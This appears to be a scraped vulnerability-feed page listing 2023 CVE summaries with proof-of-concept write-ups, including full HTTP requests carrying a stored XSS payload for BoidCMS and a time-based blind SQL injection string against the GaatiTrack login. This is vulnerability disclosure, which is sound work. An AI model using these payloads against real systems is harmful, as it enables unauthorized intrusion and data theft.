TOTOLINK N300RT version 3.2.4-B20180730.0906 has a post-authentication RCE due to incorrect access control, allows attackers can bypass front-end security restrictions and execute arbitrary code.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48860: security_research/TOTOLINK-N300RT-RCE.md at main · xieqiang11/security_research

DLL hijacking vulnerability in TTplayer version 7.0.2, allows local attackers to escalate privileges and execute arbitrary code via urlmon.dll.

CVE-2023-48861: POC4/README.md at main · xieqiang11/POC4

An issue in SCOL Members Card mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.

CVE-2023-43298: CVE-reports/CVE-2023-43298.md at main · syz913/CVE-reports

An issue in DA BUTCHERS mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.

CVE-2023-43299: CVE-reports/CVE-2023-43299.md at main · syz913/CVE-reports

An issue in urban_project mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.

CVE-2023-43300: CVE-reports/CVE-2023-43300.md at main · syz913/CVE-reports

A cross-site-scripting vulnerability exists in Ruckus Access Point products (ZoneDirector, SmartZone, and AP Solo). If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is logging in the product. As for the affected products/models/versions, see the information provided by the vendor listed under [References] section or the list under [Product Status] section.

CVE-2023-49225: 20231128 | Security Bulletins | Ruckus Wireless Support

Availability Booking Calendar 5.0 is vulnerable to Multiple HTML Injection issues via SMS API Key or Default Country Code.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48825Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)

CVE-2023-48825: PHPJabbers Availability Booking Calendar 5.0 HTML Injection ≈ Packet Storm

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48823Descriptions:Blind SQL injection in ajax.php in GaatiTrack Courier ManagementSystem v1.0 allows an unauthenticated attacker to insert malicious SQLqueries via email parameter.Steps to Reproduce:1. Request:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com&password=1234562. Now use blind sqli query after email parameter. So your request data will be:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

CVE-2023-48823: GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm

A Cross Site Scripting vulnerability in Availability Booking Calendar 5.0 allows an attacker to inject JavaScript via the name, plugin_sms_api_key, plugin_sms_country_code, uuid, title, or country name parameter to index.php.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

Tag

#git